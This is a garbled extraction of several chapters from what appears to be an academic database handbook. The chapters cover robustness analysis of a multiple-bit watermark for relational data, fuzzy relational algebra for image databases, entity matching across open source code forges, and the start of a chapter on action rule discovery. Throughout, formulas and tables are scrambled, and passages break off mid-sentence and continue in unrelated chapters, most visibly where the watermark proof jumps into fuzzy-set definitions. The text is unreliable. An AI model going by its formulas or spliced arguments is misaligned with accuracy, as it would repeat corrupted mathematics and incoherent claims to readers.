wl is recovered by computing XOR on a located bit in the data with the computed mark bit x. The ownership is claimed as long as the original watermark string W can be recovered from the data. The AK scheme can be considered to be a special case of this extended scheme where W is 1-bit 0. Compared to the AK scheme, the same number ω ≈ η/ϕ of least-significant bits is selected in our extended scheme for embedding watermark information; thus, the error introduced by the embedding process is the same as the AK scheme. The reader is referred to Agrawal et al. (2003) for more details on the analysis of watermarking error. The difference is that each watermark bit wl is embedded ϖ ≈ ω/L times as compared to ω times in the original scheme; thus, the robustness analysis on the watermarking scheme must be adapted to take this into consideration. A preliminary analysis of our extended scheme was first reported in Li, Swarup, and Jajodia (2003a).
Robustness Analysis for Multiple-Bits Scheme The robustness of a watermarking scheme can be measured by the following probabilities: (a) false hit rate, in which a valid watermark is detected from unmarked data, (b) invertibility rate, where a fictitious secret key is derived from marked data, and (c) false miss rate, in which no valid watermark is detected from marked data in the presence of various types of attacks. The smaller these probabilities, the more robust the watermarking scheme. In the robustness analysis, we use the following notation: (a) the probability function of binomial distribution b(k; n, p) = Cnk pk qn−k (i.e., probability of obtaining exactly k successes out of n Bernoulli trials with probability p of success in any trial), and (b) the survival function of binomial distribun tion B(k; n, p) =∑ i = k +1 b(i; n, p) (i.e., probability of having more than k successes in n independent Bernoulli trials).
2229
A Multiple-Bits Watermark for Relational Data
False Hit Being aware of the existence of a watermarking technique, a pirate may modify marked data so as to confuse ownership proof. Therefore, watermark detection may be applied to not only the original marked data, but also unmarked data, both of different sizes. Claim 1. If the detection algorithm is applied L −1 to unmarked data, then the false-hit rate is ∏ i =0 1 B(τωi; ωi, 0.5) ≤ 2L , where ωi > 0 is the number of times that the watermark bit i is extracted from data. Proof. If the detection algorithm is applied to unmarked data, it may possibly return some binary string (w0,..., wL–1) as a potential watermark. Let wi be extracted from data ωi times and ωi > 0. Due to the use of pseudorandom generator S in detection, wi is extracted each time from unmarked data as 0 or 1 with the same probability 0.5. Due to the use of threshold τ in detection, wi is detected as 0 or 1 with the same probability B(τωi; ωi, 0.5). The probability that a binary string (w0,..., wL–1) L −1 is obtained in detection is ∏ i =0 2B(τωi; ωi, 0.5). Now, there is only one watermark in the space of 2L possible binary strings. Thus, the probability that the binary string obtained matches the original L −1 watermark is 1/2L. The false-hit rate is 21L ∏ i =0 2B(τωi; ωi, 0.5) = B(τωi; ωi, 0.5). The false-hit rate has an upper bound 1/2L due to B(τωi; ωi, 0.5) ≤ 0.5 for τ ∈ [0.5, 1). The upper bound is independent of ωi and τ. Therefore, no matter what the size of the data and the detection threshold are, the false-hit rate can be reduced exponentially by increasing L. The AK scheme corresponds to a special case of our scheme where L=1. In the AK scheme, the false-hit rate is B(τω; ω, 0.5) , where ω is the total number of mark bits extracted from targeted data. The false-hit rate in the AK scheme may be controlled by the detection threshold τ. For example, for ω = 1,000, it is required that τ = 0.6 so that the false-hit rate is less than 10 −10. To reduce the
2230
false-hit rate, one needs to increase the detection threshold τ. The side effect of increasing threshold τ in detection is that the scheme is more vulnerable to some attacks. For example, the scheme will return no valid watermark from marked data if an attacker flips at least 100(1-τ)% of the ξ least-significant bits of all values. The smaller the parameter τ, the more robust the scheme is against such attacks at the price of a larger false-hit rate. In our extended scheme, we can choose τ=0.5 to maximize the robustness without degrading the false-hit rate significantly as it is bounded by 1/2L; therefore, a simple majority vote can be used in our watermark detection as long as the length of the watermark is long enough (e.g., L=40). In comparison, the false-hit rate is close to 50% for τ=0.5 in the AK scheme, which is intolerable in most cases. Note that in the AK scheme, the false-hit rate depends not only on τ, but also on the size of data (in terms of ω). Since the size of data may change due to various attacks, one has to determine an appropriate τ by solving a false-hit equation for different sizes of data. The smaller the size of the data, the more a larger τ is required (thus the weaker the scheme is against attacks). For example, if ω decreases from 1,000 to 100, then τ must increase from 0.6 to above 0.7 so as to keep the false-hit rate below 10−10. In our extended scheme, a simple majority vote (i.e., τ=0.5) can be used uniformly for any size of data, which significantly simplifies the detection process.
Invertibility Now consider when a pirate discovers a secret key from marked data that yields a satisfactory watermark. A pirate can use the discovered key to claim legitimate ownership of the data. Alternately, a pirate can claim innocence by claiming that data owner used this type of invertibility attack to obtain the evidence of piracy.
A Multiple-Bits Watermark for Relational Data
Claim 2. If a pirate randomly selects a secret key, then the probability that this key causes a valid watermark to be detected from pirated data is
so as to maximize the robustness of our scheme against various attacks.
False Miss max(
1 2| K |
L −1
, ∏ i =0 B(
i;
i , 0.5))
≤
1
1
, ), 2| K | 2 L
where ωi > 0 is the number of times that watermark bit i is extracted from data. 1
Proof. The first term 2|K | is the probability that the tried key is the real secret key K (assume that the length of the secret key is fixed and public). The second term is the probability of detecting a valid watermark from pirated data using a different secret key, which is the same as the probability of detecting a valid watermark from unmarked data. An attacker may choose his or her own parameters γ, L, and τ to increase this probability. In particular, if τ=0.5 is selected, this term reduces to its upper bound 1/2L. Thwarting this invertibility attack requires choosing a long-enough watermark and secret key (e.g., L ≥ 40 and AES |K| ≥128). This requirement can be enforced by a standard process or public announcement. Note that an alternate convention might be to require τ to be greater than 0.5; however, an attacker may get around that convention by first reducing ωi (e.g., via a subset attack) before launching an invertibility attack. Consider the AK scheme, which corresponds to a special case of our scheme where L=1. No matter how long a secret key is, the invertibility attack could succeed with high probability because the second term B(τω; ω, 0.5) in the invertibility rate may approach 50% when an attacker manipulates the size of the data and the detection threshold. In comparison, this term in our scheme has the upper bound 1/2L , which is independent of the size of the data and the detection threshold τ. Since the false-hit rate and invertibility rate in our scheme are controlled by the length of the watermark, we choose τ=0.5 in the following
Watermarking schemes should be robust against malicious attacks or benign update operations that may destroy the embedded watermark. Since the embedded watermark can always be destroyed by making substantial modifications to marked data, we assume that when attacks modify data, they also degrade the value of the data. We consider the robustness of our watermarking scheme relative to typical database attacks. In this section, we focus on typical tuple-related attacks that have been considered in Agrawal and Kiernan (2002).
Value Modification Consider value modification in which an attacker randomly selects some data values and flips their least-significant bits. Assume that the attacker toggles each least-significant bit with probability pf, where pf > 0.5 (if pf > 0.5, then watermark detection can be applied to transformed data in which each bit is flipped back) is called the flipping probability (subscript f stands for flipping). Claim 3. If a value modification attack is applied to a watermarked relation with flipping probability pf, then the false-miss rate is L −1
1 – ∏ i =0 (1–B( i ; ωi, pf)), 2
where ωi > 0 is the number of times that watermark bit wi is embedded in the data. Proof. Due to the majority vote, watermark detection fails to detect watermark bit wi only if at least ωi /2 embedded bits that correspond to wi are toggled. Thus, the probability that the watermark bit is not recovered is B( i ; ωi, pf). 2 The probability that the entire watermark is not recovered (i.e., the false-miss rate) is L −1
1 – ∏ i =0 (1–B( i ; ωi, pf)). 2
2231
A Multiple-Bits Watermark for Relational Data
Figure 1. False-miss rate under value modification attack
In an average case, we have ωi = ϖ = ω/L and the false miss rate 1 – (1 – B( ; ϖ, pf)L). Figure 2 1 plots the false-miss rate in the average case. The two parameter values that are varied are ϖ and pf. The figure uses the default value 100 for L. The figure shows that with a proper choice of parameters, a successful attack requires pf being large, causing a perceptible change to the data relation.
Tuple Deletion and Insertion Consider tuple deletion, in which an attacker deletes a subset of tuples from a watermarked relation. Suppose that the attacker examines each tuple independently and selects it with probability pd for inclusion in the pirated relation. Claim 4. If a tuple deletion attack is applied to a watermarked relation, then the false-miss rate is L −1
1 – ∏ i =0 (1– pd i), where ωi > 0 is the number of times that watermark bit wi is embedded in the data, and pd is the probability that a tuple is deleted in the attack.
2232
Proof. For the attack to be successful, it must delete all embedded bits for at least one watermark bit. Now, each watermark bit wi is embedded ωi times, so the probability that all the embedded bits for wi are deleted is B(ωi – 1; ωi, pd) = pd i. Therefore, the false miss rate is L −1
1 – ∏ i =0 (1– pd i). In an average case where ωi = ϖ = ω/L, we have the false-miss rate 1 – (1– pd )L. Figure 2 shows that a tuple deletion attack is unlikely to succeed unless a large number of tuples are deleted. A tuple deletion attack is a less effective attack than a value modification attack. However, it is more potent when used in combination with a value modification attack. A tuple deletion attack reduces the average times a watermark bit is embedded and hence makes the pirated relation more susceptible to value modification attacks. Figure 3 plots the false-miss rate as a function of the ratio of tuples deleted and the flipping probability in a combination attack. Another type of attack is tuple insertion attack, in which an attacker takes a marked rela-
A Multiple-Bits Watermark for Relational Data
Figure 2. False-miss rate under tuple deletion attack
Figure 3. False-miss rate under combination attack
tion and mixes it with η · pi tuples from other sources, where η is the number of tuples in the original relation and pi ≥ 0 is the insertion rate. In watermark detection, each watermark bit wl is extracted from those additional tuples roughly ωl · pi times, where ωl is the number of times the watermark is extracted from the original data.
Then the probability that this watermark bit is not recovered due to the attack is B(
l (1 +
2
pi )
;
l
pi , 0.5).
It is then fairly straightforward to derive the false-miss rate for the tuple insertion attack. It is
2233
A Multiple-Bits Watermark for Relational Data
more difficult for an attacker to confuse ownership proof by launching a tuple insertion attack than manipulating the same number of tuples in a tuple deletion attack.
WATERMARKING WITHOUT PRIMARY KEY Both the AK scheme and our extended scheme depend critically on a primary key and the original order of database attributes. These schemes do not apply if the data have no primary key attribute or in the case that either the primary key or the order of attributes is modified. These schemes are therefore not robust against attribute-related attacks such as attribute deletion and insertion. In this section, we propose alternative schemes that do not depend on primary-key attributes or the attribute order. A preliminary analysis of these schemes was first reported in Li, Swarup, and Jajodia (2003b).
Element-Based Scheme The multiple-bits scheme discussed in the above section can be called tuple based as it processes data tuple by tuple in watermark insertion and detection. An alternative approach is to process each numerical value independently. A virtual primary key vpk is constructed from each attribute value or data element. We call such scheme element based. For each element r.Ai of tuple r, the bits of r.Ai are partitioned into two parts: lsb(r.Ai) and vpk(r.Ai), where lsb(r.Ai) may be used to embed a watermark bit and vpk(r.Ai) is used as its virtual primary key. The least-significant bit portion lsb consists of ξ bits in which a watermark bit may be embedded. The virtual primary key vpk consists of the (most significant) bits except the bits in lsb. Changing vpk would introduce intolerable error to the underlying data.
2234
Recall that tuple-based schemes embed one bit per γ tuples. To maintain the same ratio, the element-based scheme embeds one bit per γν elements: An element r.Ai is selected for embedding a watermark bit if S1(K, vpk(r.Ai)) mod γν equals 0. If element r.Ai is selected, its least-significant bit j in the lsb(r.Ai) portion is selected, where j= S3(K, vpk(r.Ai)) mod ξ. Then the element-based scheme embeds (or extracts) a watermark bit to (or from) the selected bit exactly as the tuple-based scheme does.
Combination-Based Scheme Another solution is to combine some significant bits from multiple attributes for constructing the virtual primary key and process the data tuple by tuple, based on each tuple’s virtual primary key. We call such scheme combination based. The construction of the virtual primary key does not depend on the order of the attributes. For each tuple r, the combination-based scheme computes its virtual primary key r.V by concatenating k (1 ≤ k ≤ ν) keyed hash message authentication codes (in the case that the concatenation results in too-long binaries, the virtual primary key can be constructed from hashing the concatenation result) in {HMAC (K, vpk(r.Ai)): i=0,…,ν-1} that are closest to 0 (hash values are interpreted as natural numbers when comparing with 0). The attributes used for constructing the virtual primary key are not fixed but may change from tuple to tuple. Without knowing the secret key, an attacker is unable to determine which attributes are selected for constructing the virtual primary key in each tuple. The combination-based scheme then uses the tuple-based technique to process each tuple, but with two modifications. First, the combinationbased scheme uses the virtual primary key in place of the real primary key. Second, for each tuple
A Multiple-Bits Watermark for Relational Data
r that has been selected, attribute Ai is chosen if its hash value HMAC (K, vpk(r.Ai)) is closest to 0 among all attributes’ HMAC hash values. Multiple attributes may be selected if they have the same lowest HMAC hash value. In comparison, the tuple-based scheme selects a single attribute Ai if i = S2 (K, vpk(r.Ai) mod ν. Note that in the combination-based scheme, the attribute(s) selected for embedding a watermark bit is (are) among those that are used for constructing the virtual primary key (i.e., the lowest hash value is among the k lowest hash values). The construction of the virtual primary key depends on the hash values rather than the order of the attributes.
Robust Analysis for Virtual-Primary-Key-Based Schemes Recall that the analysis on the tuple-based scheme is independent of the composition of the primary key; thus, it holds for the combination-based scheme as long as the virtual primary key has the same uniqueness property as the real primary key. In this section, we first extend the robustness analysis to attribute-related attacks and then study the impact of using the virtual primary key instead of the real primary key in robust analysis. Unless otherwise stated, our analysis is applied to the combination-based scheme. A comparison of the combination-based scheme with the elementbased scheme is given at the end.
probability pf. The flipping probability is the probability that each extracted watermark bit is not as expected. In the context of attribute deletion and addition, this probability is renamed equivalent flipping probability pˆ f. We study how to calculate pˆ f in attribute deletion and addition attacks. As long as pˆ f is obtained, the false-miss rate can be computed the same way as in a value modification attack (by replacing pf with pˆ f). Claim 5. If d out of ν attributes are deleted in a watermarked relation where the virtual primary key is constructed from k attributes, then the false-miss rate is L −1
1 − ∏ i =0 (1 − B(
2
;
1 C k− d − , )), i 2 2C k
where ωi > 0 is the number of times that watermark bit wi is extracted from the data. Proof. An extracted bit is not as expected only if the virtual primary key is altered; that is, some of the k attributes that are involved in the construction of the virtual primary key are deleted. Since the k attributes are randomly distributed from tuple to tuple, the probability that the virtual primary key is altered is 1−
C k− d Ck
.
It is equally likely that the altered virtual primary key leads to a correct or incorrect bit being detected. Therefore,
Attribute Deletion and Addition pˆ f =
Assume that k out of ν attributes are selected for constructing the virtual primary key and that the k attributes are randomly distributed among ν attributes from tuple to tuple. We analyze the false-miss rate of watermark detection when applied to marked data in which some attributes may be deleted or added. Our analysis is similar to that for a value modification attack, where the false-miss rate is measured in terms of flipping
i
1 C k− d . − 2 2C k
Note that the false-miss rate is computed based on the extracted times rather than the embedded times of each watermark bit. If the extracted times are unknown, it can be estimated as d/ν of the embedded times. The false-miss rate in an attribute deletion attack is computed exactly as in a value modification
2235
A Multiple-Bits Watermark for Relational Data
attack, except that pf is replaced with pˆ f. Figures 4 and 5 plot pˆ f as functions of d and k, respectively. Figure 4 shows that the more the attributes are deleted, the larger the equivalent flipping probability and the larger the false-miss rate. Figure 5 indicates that the less attributes are involved in the construction of the virtual primary key, the less the impact of attribute deletion. However, as it shall be shown in the next subsection, using less attributes in the construction of the virtual primary key will degrade the uniqueness property of the virtual primary key, which increases the false-miss rates against tuple-related attacks. Therefore, there is a trade-off between tuple-related attacks and attribute deletion in terms of the number of attributes in the virtual-primary-key construction. The optimal number can be decided by minimizing the overall false-miss rates in the evaluation of these attacks. Now consider attribute addition. We assume that all hash values HMAC(K,vpk(r.A)) are uniformly distributed from 0 to U, where U is the largest possible hash value. Claim 6. If d>0 attributes are added to a watermarked relation where the virtual primary
key is constructed from k out of ν attributes, then the false-miss rate is L −1
1 − ∏ i =0 (1 − B (
i
2
;
i,
1 1 k d − (1 − ) )), +1 2 2
where ωi > 0 is the number of times that watermark bit wi is extracted from the data. Proof. For each tuple r where a watermark bit is embedded, k HMAC hash values h0,..., hk−1 are used for constructing the virtual primary key, where the k hash values are selected from {HMAC(K,vpk(r. Ai)): i=0,…ν-1} that are closest to 0. The watermark bit is embedded into the attribute whose hash value is the closest to 0. Now consider that one attribute Ax is added. The virtual primary key of tuple r is unaffected by the adding of Ax only if the hash value HMAC (K,vpk(r.Ax)) is greater than maxi in which each vsi is a set of elements of the form . Here, vj is a value from the corresponding fuzzy domain Di, and fj is its corresponding fuzzy membership value.
For the sake of simplicity and readability, we denote those attribute value sets vsi that are singletons and where the only member of the set has fuzzy membership degree equal to 1 (which represents full, certain membership) by means of the only domain value. This is the case, for example, for the Ves_pict.gif, Coast_pict.gif, Snow_pict.gif, and Sunset_pict.gif values of the File field in the data presented in Table 1. As we already have mentioned, we also consider as a special case the presence of a membership degree of 0. This represents the certain nonmembership. In our model, the presence of pairs < v, 0> in an attribute value does not provide any information in addition to what we could have if we did remove that pair from the set, since domain values that do not appear in an attribute value implicitly are associated with the membership degree 0. For example, the attribute values {< red, 0.5 >} and {, < green, 0.0>} provide the same information. Thus, we assume that our attribute value sets do not contain any such pair. Since the fuzzy values are derived from data returned by some automatic vision systems, and since data provided by visual systems are only nonzero values (systems only give information
2283
Managing Uncertainties in Image Databases
about feature values they find in the considered image), then this also is not a restriction from an implementation point of view. 2
FNF fuzzy relation schema. A fuzzy relation schema is used to associate attribute names to domains. In the following, we also use the term fuzzy attribute to denote an attribute A whose domain dom(A) is a fuzzy set. A fuzzy relational schema is defined as a symbol R, which is the name of the fuzzy relation, and a set X = { A1, … , An } of (names of) fuzzy attributes. The schema is denoted as R(X). FNF2 fuzzy relation. A fuzzy relation is an instance of a fuzzy relation schema; that is, a fuzzy relation is a set of fuzzy tuples, as stated in the following definition. Let R({ A1, A2,… , An}) be a relational schema. A fuzzy relation, defined over R, is a set of fuzzy tuples t = < vs1, …, vsn > such that each vsi is a fuzzy subset of dom(Ai). An example of a fuzzy relation has been given in Table 1. The schema of this example relation has four attributes: File, Color, Texture, and Content. Each attribute value is a set of pairs.
Manipulation of FNF2 Fuzzy Relations FNF2 relations are accessed and manipulated by means of a corresponding FNF2 algebra. The usual set theoretic operators can be extended to fuzzy sets in different ways, depending on the specific semantics associated with the fuzzy logical connectives. In fact, several semantics have been proposed for fuzzy logical connectives, and (∧) and or (∨), but it has been proved that the min-max semantics is the only semantics for conjunction and disjunction that preserves logical equivalences and satisfies the idempotency property (Yager, 1982).
2284
This motivates our choice to adopt the following definitions for fuzzy logical operators. -Fuzzy intersection (and): A ∧ B ={< u, min(μA(u), μB (u))> | u ∈ U} -Fuzzy union (or): A ∨ B = { | u ∈ U} - Fuzzy complementation (not): ¬ A ={ | u ∈ U} In these definitions, U represents the universe (i.e., the domain against which fuzzy membership is evaluated). In this chapter, we do not present the details of the algebra. Instead, we concentrate on the primary aspects on which the FNF2 algebra is founded: (i) tuple comparison, which is the basis of all operations that would require some logical predicate on tuples to be evaluated; (ii) tuple combination, on which most algebraic operations rely for putting information together after identifying the relevant tuples to be combined; and (iii) tuple ordering, the basis of all operations having to do with ranking based on a given criterion. Tuple comparison. Tuple comparison is the basis of several algebraic operations, including the set oriented ones. In FNF2 data model, attribute values are sets of pairs. Depending on the query, comparison either can involve the complete information represented by the tuples or can be restricted to a particular component. Indeed, it might be necessary to recognize and combine those tuples that contain, for every attribute in their schema, the same sets of values; these values might differ at most because of membership degrees. This notion is formalized in the definition of data identical tuples. Let R({ A1, A2,…, An}) be a relation schema and r be an instance of R. Let t1 = and t2 = denote two tuples of r. The tuples t1 and t2 are data identical iff for every index i, it holds that data1= {u | ∈ vsi1} = data2 = {u | ∈ vsi2}. As an example, consider the tuples t1 and t2 in Table 2, which are data identical. As the comparison operator, depending on the intended meaning of the query processing operations, either more traditional equality or data identicalness can be used. Consider, for example, the set union operation. Union merges the tuples appearing in the given sets and removes duplicates. If equality is used as the comparison operator, then the resulting relation can contain multiple instances of data-identical tuples, which are not eliminated because of the different degrees of certainty of their attribute values. This could be the intended meaning if the operation has the goal of keeping track of all the data retrieved by the feature extraction modules. On the other hand, for applications that need to return a single certainty information for every feature data value in the result, the existence of data-identical tuples cannot be acceptable. Therefore, data-identical tuples should be combined. Similar considerations apply to the other set operators as well. In particular, intersection returns the tuples that are in common. Therefore, it depends on the meaning associated to “being in common,” and on the treatment chosen for data-identical (but distinct) tuples occurring in the relations being intersected. Similarly, set difference returns the tuples appearing in the first relation and not appearing in the second one. Therefore, it also depends on the comparison operator chosen and on the treatment selected for data-identical tuples.
Tuple combination. Different alternative tuple combination functions can be defined, depending on the intended meaning of the union operation. In particular, if we want to adopt a skeptical treatment toward the combination results, we use conjunction as the combination function for data-identical tuples, while an optimistic treatment of combination would make disjunction preferable: •
•
Optimistic combination ( ⊕o ): Let t1 = and t2 = be two data-identical tuples. t1 ⊕o t2 = , where for each i, vsi = {< u, μ1(u) > ∨ < u, μ2(u) > | < u, μ1(u) >∈ vsi1 and < u, μ2(u) >∈ vsi2 }. Skeptical combination ( ⊕s ) is defined in the analogous way by applying the fuzzy and operator on the values instead of the fuzzy or: t1 ⊕s t2 = , where for each i, vsi = {< u, μ1(u) > ∧ < u, μ2(u) > | < u, μ1(u) >∈ vsi1 and < u, μ2(u) >∈ vsi2 }.
As an example, we consider the two dataidentical tuples, t1 and t2, introduced previously. Their optimistic and skeptical combinations are as shown in Table 3. Both optimistic and skeptical combinations are commutative and associative. They inherit the properties from commutativity and associativity of fuzzy and and fuzzy or and from the standard set union. Therefore, combination operators can be extended straightforwardly to sets of dataidentical tuples.
Table 2. Example of data identical tuples File
Color
Texture
Content
, , , ,
, , ,
< human, 0.95>
t1 Ves_pict.gif
, , , ,
, , ,
< human, 0.9>
t2 Ves_pict.gif
2285
Managing Uncertainties in Image Databases
Table 3. Optimistic and skeptical combinations File t
Ve s _ pic t .
1
⊕o t2
gif
Color
Texture
, , , , , 0.311>,
t
Content
Comparing with constants: These conditions are defined on individual attribute values (i.e., a single set of value/degree pairs). 1. Fuzzy pair membership condition tests whether a given pair belongs to a given set. This condition generally is used to retrieve images with a specific feature value; for example, in any query, such as “Find all images in the relation r in which the color red appears with certainty 0.8.” Syntactically, this selection
0.1>
2.
3.
4.
condition can be expressed as ∈ r.Color. Fuzzy pair membership condition, restricted to data value, tests whether a pair with a specific data value belongs to a given attribute value. For example, this condition allows the retrieval of images in which some quantity of red is identified by the feature extraction module. This query could be expressed as ∈ r.Color, where “_” is a wildcard. Fuzzy pair membership condition, restricted to certainty-value, tests whether a pair with specific certainty value belongs to a given attribute value. For example, we might be interested in knowing if there is any color that has been recognized with certainty 0.9 in a given collection of pictures. This query can be written as ∈ r.Color. Fuzzy pair membership condition, restricted to certainty value thresholds, tests whether there is any pair with a certainty value above a given threshold (or, similarly, below the threshold). Conditions of this sort allow users to retrieve those images whose data certainty values are above the threshold of interest for the specific application. For example, the condition ∈ 0 License matches, per token match, but only if score > 0
Modifier +3.00 +2.00 -1.00 +0.50 +0.50 +0.50
Table 7. Trial four sample scoring table Modifier Top of chart same as for Trial Two: URLs, Names… If score = 0, measure Levenshtein distance between names, giving 0.5 if 0 License matches, per token match, but only if score > 0
tributes. The remaining token match attributes (programming languages and licenses) were only scored if the project pair already had some sort of positive correlation from one of the other three major attributes (URL, short name, or long name). This seemed to solve the problem of trivial token matching, and solved some of the problems of processing time. In Trial Three, we decided to explore solutions for the speed-of-processing issues caused by our massive Cartesian product generation (all projects in one forge times all projects in another forge). To do this, we considered what we know about how disjoint sets work (Section 2.2 and 3.4.2). We decided to invert our program logic a bit: instead of building up a huge list of projects and comparing all projects in forge A against all projects in forge B, we instead attempt to identify likely sets immediately (or eliminate disjoint sets
2310
+0.25 +0.50 +0.50
immediately) and thus we can discount projects that are unlikely to be related. This will serve to reduce the size of the sets being compared. For example, we built a list of projects that used Java on forge A and another list of projects that use Java on forge B, then only compare these projects along the other attributes. This method didn’t actually reduce the number of comparisons, since every project had one or more programming languages, but it did serve to reduce the size of the in-memory hashes being built. In Trial Four we wanted to improve the accuracy of our partial name matches. We decided to use Levenshtein distances to measure the similarity between two tokens, such as between two short names. (In Trial One we had used simple regular expression-based partial string matches, so for example, starfish and xstarfish would match but andychat and andyschat45 would not
Integrating Projects from Multiple Open Source Code Forges
match.) Levenshtein distances are calculated for each string pair based on the smallest number of characters that must be deleted, replaced, or inserted to make one string into another string. In our case, we choose to set an arbitrary threshold for similarity at 25%. The Levenshtein distance between andychat and andyschat45 is 3 (or 25% of the longest string), which is (barely) enough to warrant token matching in programming languages and license types according to our threshold of 25% or less.
LIMITATIONS AND FUTURE WORK Based on the experiments described in Section 4, entity matching is an interesting exercise, but is certainly problematic. One of the most obvious problems is that the scoring modifiers given in Tables 4, 6, and 7 are completely arbitrary and based on trial and error and an intuitive sense of the data. In the case of Trial One, there is a distinct possibility that a pair of projects could achieve a score of 4.0 by having a partial non-dictionary name match (+.5), five attributes in common (+2.5), and a handful of well-chosen tokens in the textual description (+.5), and yet these projects could be completely unrelated. Tweaking the scores to reduce false positives and false negatives in this way is tedious and inefficient. In the subsequent trials, we attempted to reduce processing time and false positives/false negatives, but there are many other routes we could have taken to accomplish this. For instance, in the case of token matching, we look at the case of ant, for which there were very few singularly meaningful tokens in the textual descriptions, but the description as a whole matched perfectly. The use of dictionary word definitions for frequency matching may need to be refactored also. The ant match lost points because of this. We also recognize that open source developers and projects are a decidedly global population, and more languages than just English are used, so perhaps
English dictionary matching is an arbitrary solution. Would other dictionaries be effective? Should non-dictionary strings that are also common in software development (“lib”, “db”, “php”) be added to the dictionary? Next, what about multi-way matches? We have given little attention to the problem (as presented in Howison, et al. 2006) of how to merge multiple confidence scores after they’ve been created. Consider a project such as sqlite-ruby that appears on Sourceforge, Rubyforge, Freshmeat, and the FSF directory. What is the appropriate way to integrate its multiple scores? Sqlite-ruby is likely to have high scores on all 6 pair combinations, so a simple average might work, but what about a project like ant whose scores may vary more? Section 3 mentioned the possibility of matching projects based on the lists of developers on each project. Before doing this, it would be necessary to use similar entity matching methods to actually match developer entities as well. As is described in Robles and Gonzalez-Barahona (2005), matching developers also leads to a few additional complexities: “real” emails are most often not available for public lists of developers on code repositories, name matching with developers could be even more complex than matching on names for projects because of similarities in names and spellings, and of course, developer privacy is always a concern when integrating personal data points. One final recommendation for future work is to remember some of the work being done on sites like Krugle, Ohloh, Swik, DOAPSpaceand the Galactic Project Registry to standardize the notion of a project name. Krugle is a source code search engine that actually uses some FLOSSmole data to populate its list of projects. Swik and Ohloh are user-driven directories of information about individual open source projects; Swik gets some of its initial information from FLOSSmole as well. DOAPSpace and the Galactic Project Registry are two different efforts to put together the DOAP (description of a project) metadata for
2311
Integrating Projects from Multiple Open Source Code Forges
all open source projects. Each of these efforts probably would benefit from this discussion about entity matching and duplicate identification across repositories, and perhaps they can contribute to the conversation about the best way to achieve this goal.
REFERENCES Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, “Levenshtein distance”, in Dictionary of Algorithms and Data Structures [online], Paul E. Black, ed., U.S. National Institute of Standards and Technology. 11 June 2007. (Accessed 15 June 2007) Available from: http://www.nist.gov/dads/HTML/Levenshtein.html
approach. In Proc. of the IJCAI Workshop on Information Integration and the Web. (Acapulco, Mexico, 2003). 53-58. Garcia-Molina, H. 2006. Pair-Wise entity resolution: overview and challenges. In Proceedings of the 15th ACM international Conference on information and Knowledge Management (Arlington, Virginia, USA, November 06 - 11, 2006).CIKM ‘06. ACM, New York, NY, 1-1. Hernandez, M. A. and Stolfo, S. J. 1995. The merge/purge problem for large databases. SIGMOD Rec. 24, 2 (May. 1995), 127-138. Howison, J., Conklin, M., Crowston, K. OSSmole: A collaborative repository for FLOSS research data and analyses. In Proc. 1st Intl. Conf. on Open Source Systems. (Genova, Italy, June 2005). 54-59.
Batini, C., Lenzerini, M., Navathe, S.A comparative analysis of methodologies for database schema integration. ACM Comp. Surveys, 18:4 (1986). 323-364.
V. I. Levenshtein, Binary codes capable of correcting deletions, insertions, and reversals. Soviet Physics Doklady 10 (1966):707–710.
Bitton ,D. David J. DeWitt, Duplicate record elimination in large data files, ACM Transactions on Database Systems (TODS), v.8 n.2, p.255-265, June 1983
On, B-W., Lee, D., Kang, J., Mitra, P. Comparative study of name disambiguation problem using a scalable blocking-based framework. In Proc. of 5th ACM/IEEE-CS Joint Conf. on Digital Libraries. (Denver, CO, USA, 2005). 344-353.
Conklin, M. Beyond low-hanging fruit: seeking the next generation of FLOSS data mining. In Proc. 2nd Intl. Conf. on Open Source Systems. (Como, Italy, June 2006). Springer, New York, NY, 2006. 47-56. Doan, A., Domingos, O., Halevy, A. Reconciling schemas of disparate data sources: A machine learning approach. In Proc. of the SIGMOD conference. (Santa Barbara, CA, USA, 2001). ACM Press, New York, NY, 2001, 509-520. Doan, A., Lu, Y., Lee, Y., Han, J. Object matching for information integration: A profiler-based
Rahm, E. and Bernstein, P. A survey of approaches to automatic schema matching. VLDB J:10, 2001. 334-350. Robles, G. and Gonzalez-Barahona, J. Developer identification methods for integrated data from various sources.In Proc. of Mining Software Repositories Workshop (MSR 2005) (St. Louis, MO, USA, 2005). 1-5. Winkler, W. The State of Record Linkage and Current Research Problems. Technical Report, Statistical Research Division, US Bureau of the Census, 1999
This work was previously published in the International Journal of Open Source Software & Processes, edited by S. Koch, Volume 1, Issue 1, pp. 46-57, copyright 2009 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
2312
2313
Chapter 7.23
Extended Action Rule Discovery Based on Single Classification Rules and Reducts Zbigniew W. Ras University of North Carolina at Charlotte, USA Elzbieta M. Wyrzykowska University of Information Technology and Management, Poland
ABSTRACT Action rules can be seen as logical terms describing knowledge about possible actions associated with objects that are hidden in a decision system. Classical strategy for discovering them from a database requires prior extraction of classification rules that next are evaluated, pair by pair, with a goal to build a strategy of action based on condition features, in order to get a desired effect on a decision feature. An actionable strategy is represented as a term r = [(ω) ∧ (α→β)]⇒[φ→ψ], where ω, α, β, φ, and ψ are descriptions of events. The term r states that when the fixed condition ω is satisfied and the changeable behavior (α→β) occurs in objects represented as tuples from a database, so does the expectation (φ→ψ). With each object, a number of actionable strategies can be associated, and
each one of them may lead to different expectations and the same to different reclassifications of objects. This chapter will focus on a new strategy of construction of action rules directly from single classification rules instead of pairs of classification rules. This way we do not only gain on the simplicity of the method of action rules construction, but also on its time complexity. The chapter will present a modified tree-based strategy for constructing action rules, followed by a new simplified strategy of constructing them. Finally, these two strategies will be compared.
INTRODUCTION There are two aspects of interestingness of rules that have been studied in data mining literature, objective and subjective measures (Adomavicius
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
